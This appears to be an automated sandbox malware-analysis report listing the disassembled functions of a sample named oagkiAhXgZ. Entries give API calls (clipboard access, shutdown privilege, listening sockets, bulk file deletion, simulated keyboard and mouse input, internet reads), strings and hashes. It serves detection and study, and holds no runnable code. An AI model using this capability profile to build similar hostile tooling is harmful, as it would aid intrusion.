Opcode ID: 474c40d405657c44fab39978cad36ccf819352149552121a94d5bcb16ed75566
Instruction ID: 69fb2ef38cf13303d775503ceca7154d498df672a156bcd580c5911a42113a5a
Opcode Fuzzy Hash: 474c40d405657c44fab39978cad36ccf819352149552121a94d5bcb16ed75566
Instruction Fuzzy Hash: 97615C3180111DAECF05EBE0DA929EEBBB5AF55340F2481A9E406771D1EF35AF09CB61

Function 00B1ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B1ED91
EmptyClipboard.USER32 ref: 00B1ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00B1EDAC
CloseClipboard.USER32 ref: 00B1EEA3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
Instruction ID: 1fd8fddc1864ee0a993a603d90cdaf1eaf3c8d7c01e13091c1d4a12c7fcc8a44
Opcode Fuzzy Hash: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
Instruction Fuzzy Hash: C241B435204611AFE310DF59D889F59BBE1FF44318F54C099E8259B6A2CB35EC81CB90

Function 00B0E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A

ExitWindowsEx.USER32(?,00000000), ref: 00B0E932

Strings

SeShutdownPrivilege, xrefs: 00B0E902
@, xrefs: 00B0E925
, xrefs: 00B0E95C
, xrefs: 00B0E920

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
Instruction ID: 9a3b8cbe9c187b871ddb6861d80ea139ca88f490fd0d25d1458113d302f2c974
Opcode Fuzzy Hash: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
Instruction Fuzzy Hash: 8D01D673610211AFEB5426B89C8ABBF7ADCE714750F154DA2FD22F31D1DAB19C408294

Function 00B21204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B21276
WSAGetLastError.WSOCK32 ref: 00B21283
bind.WSOCK32(00000000,?,00000010), ref: 00B212BA
WSAGetLastError.WSOCK32 ref: 00B212C5
closesocket.WSOCK32(00000000), ref: 00B212F4
listen.WSOCK32(00000000,00000005), ref: 00B21303
WSAGetLastError.WSOCK32 ref: 00B2130D
closesocket.WSOCK32(00000000), ref: 00B2133C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
Instruction ID: 21f833be267dc91376bd467332b494f493f5dad6ed0095f8e1046d87b4cd52aa
Opcode Fuzzy Hash: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
Instruction Fuzzy Hash: 4C416031A00110EFD710DF68D584B2ABBE6EF56314F288598E85A9F2D6C771ED81CBA1

Function 00ADB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00ADB9D4
_free.LIBCMT ref: 00ADB9F8
_free.LIBCMT ref: 00ADBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B43700), ref: 00ADBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00B7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00ADBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00B71270,000000FF,?,0000003F,00000000,?), ref: 00ADBC36
_free.LIBCMT ref: 00ADBD4B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: df06299222bcaab79e64c8d2206158b47ae68044e5fcaf8be8ef8be7d2f82941
Instruction ID: c2f24332e21b104e3b06f448de9771a9a9c6fbc4106cadc752754683b79e1050
Opcode Fuzzy Hash: df06299222bcaab79e64c8d2206158b47ae68044e5fcaf8be8ef8be7d2f82941
Instruction Fuzzy Hash: 83C12471920244EFCB20DF688951BAA7BB8EF45350F16459BE496DB362EB308E41D770

Function 00B0D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2

Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A

FindFirstFileW.KERNEL32(?,?), ref: 00B0D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D481
FindClose.KERNEL32(00000000), ref: 00B0D498
FindClose.KERNEL32(00000000), ref: 00B0D4A1

Strings

\*.*, xrefs: 00B0D3F2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 9294621d6fc79b04b973a31e5d3eea4c0a7d8f3768965c68ad7a054650d6d37a
Instruction ID: 53ecac252129edfabf86fa6edd83254b394f4351e530006b4c74593a9745ccd3
Opcode Fuzzy Hash: 9294621d6fc79b04b973a31e5d3eea4c0a7d8f3768965c68ad7a054650d6d37a
Instruction Fuzzy Hash: 48317E310083419BC701EFA4D9919AFBBE8BE96300F444A5DF4D5932D1EB34AA09CB63

Function 00ADE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00ADE645

Strings

1#QNAN, xrefs: 00ADF84B
1#IND, xrefs: 00ADF83D
1#INF, xrefs: 00ADF852
1#SNAN, xrefs: 00ADF844

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
Instruction ID: b534a735dd88f59411d6240c58beb37ee81322cbe11e42393960f5987c94e018
Opcode Fuzzy Hash: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
Instruction Fuzzy Hash: 4DC22771E086288FDB25DF289D407EAB7B5EB49305F1541EBD84EEB240E775AE818F40

Function 00B1648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B164DC
CoInitialize.OLE32(00000000), ref: 00B16639
CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B16650
CoUninitialize.OLE32 ref: 00B168D4

Strings

.lnk, xrefs: 00B164BA, 00B16524, 00B165E0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
Instruction ID: 3e8e5443ccd9edc074f6b01ba30964a65be97cff8a39c544244379a615fe1771
Opcode Fuzzy Hash: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
Instruction Fuzzy Hash: D1D15871508301AFC304EF24C981AABB7E9FF99704F54896DF5958B2A1EB30ED45CB92

Function 00B222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00B222E8

Part of subcall function 00B1E4EC: GetWindowRect.USER32(?,?), ref: 00B1E504

GetDesktopWindow.USER32 ref: 00B22312
GetWindowRect.USER32(00000000), ref: 00B22319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B22355
GetCursorPos.USER32(?), ref: 00B22381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B223DF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
Instruction ID: 33e90903394f0d318b6f22e5f53192137567a4c4b400ae2db0a29eed6bbe0535
Opcode Fuzzy Hash: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
Instruction Fuzzy Hash: 9E31FE72504315AFCB20DF54D849B9BBBE9FF88310F100A59F998E7181DB34EA08CB96

Function 00B19B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B19B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B19C8B

Part of subcall function 00B13874: GetInputState.USER32 ref: 00B138CB
Part of subcall function 00B13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B19BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B19C75

Strings

*.*, xrefs: 00B19B5D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
Instruction ID: 041b9fca0189571445e2e61af249377ede8bf373f61f04d3da2f8f1a804c0ba8
Opcode Fuzzy Hash: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
Instruction Fuzzy Hash: C341817190424AAFCF55DFA4C995AEEBBF8EF05310F644095F845A3291EB309E84CFA0

Function 00AB997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00AB9A4E
GetSysColor.USER32(0000000F), ref: 00AB9B23
SetBkColor.GDI32(?,00000000), ref: 00AB9B36

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
Instruction ID: b7245334d9f91cbc874a39879475187470abb355df4f274b72c88254a1e6188b
Opcode Fuzzy Hash: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
Instruction Fuzzy Hash: E0A10770118548AEE728AB7C8C99EFF3AADDF42380F25410DF712D6693CE259D42D272

Function 00B21806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B2185D
WSAGetLastError.WSOCK32 ref: 00B21884
bind.WSOCK32(00000000,?,00000010), ref: 00B218DB
WSAGetLastError.WSOCK32 ref: 00B218E6
closesocket.WSOCK32(00000000), ref: 00B21915

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
Instruction ID: 4230128f1b48b1f44997ff55e7442b36e42af7a47653bfba389ba881e0f2ce9e
Opcode Fuzzy Hash: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
Instruction Fuzzy Hash: 8651B471A00210AFEB10AF24D9C6F6A77E5EB45718F188498F90A6F3D3D771ED418BA1

Function 00B31C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B31CC0
IsWindowEnabled.USER32 ref: 00B31CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00B31CDB
IsIconic.USER32 ref: 00B31CE9
IsZoomed.USER32 ref: 00B31CF7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
Instruction ID: a0a26260ebd0e644f76573c787c316efaf8392e114f7788c5bd23f7a4622a5c2
Opcode Fuzzy Hash: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
Instruction Fuzzy Hash: AF21A3317402105FD7208F2ED894B6A7BE9EF95325F7994A8E8469F351CB71EC42CB90

Function 00AA8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00AA83FA
ERCP, xrefs: 00AA813C
VUUU, xrefs: 00AA83E8
VUUU, xrefs: 00AA843C
VUUU, xrefs: 00AE5DF0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
Instruction ID: 5e5bcb3476b5e652d875b478a33f857004c48d4df0097972f13f0a8553ae801c
Opcode Fuzzy Hash: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
Instruction Fuzzy Hash: C1A2A070E0065ACBDF24CF59C9807EEB7B1BF55314F2485AAE815AB285EB349D81CF90

Function 00B2A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B2A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00B2A6BA

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Process32NextW.KERNEL32(00000000,?), ref: 00B2A79C
CloseHandle.KERNEL32(00000000), ref: 00B2A7AB

Part of subcall function 00ABCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AE3303,?), ref: 00ABCE8A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7a38faf08a08978e5ce0cbd030b18427aec7d99b669fd29a5d96b9b6dc18f436
Instruction ID: 3a9b4f638c8fada9f0cb94131199d44bebe0cb2693496e186920441aef4e7b25
Opcode Fuzzy Hash: 7a38faf08a08978e5ce0cbd030b18427aec7d99b669fd29a5d96b9b6dc18f436
Instruction Fuzzy Hash: 59514C71508310AFD710EF24D986E6BBBE8FF89754F00895DF59997292EB30D904CB92

Function 00B0AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B0AAAC
SetKeyboardState.USER32(00000080), ref: 00B0AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B0AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B0AB88

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
Instruction ID: 7e6cc47a851bda0a7eed12a27dee2d2ae4f69bc022c5306c75770af0c5275e0e
Opcode Fuzzy Hash: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
Instruction Fuzzy Hash: 2C311431A40308AEFB359B68CC45BFA7FE6EB44310F144A9AF581A61E1D774C985C762

Function 00B1CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00B1CE89
GetLastError.KERNEL32(?,00000000), ref: 00B1CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00B1CEFE

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: ca5b7149b661470b8bade78ef12a2b980dc8bdd7550c018c2e6937b275440f7f
Instruction ID: cfff0e00f2ef54ebbfc1b09d1eb39fae21866be3dfd4b0df094cde30bc0d6dd6
Opcode Fuzzy Hash: ca5b7149b661470b8bade78ef12a2b980dc8bdd7550c018c2e6937b275440f7f
Instruction Fuzzy Hash: 8A21C172540305DBD730CFA5C988BABBBFCEB00314F60446EE546E2151EB74ED898B54

Function 00B08298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B082AA

Strings

(, xrefs: 00B082F0
|, xrefs: 00B082DA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

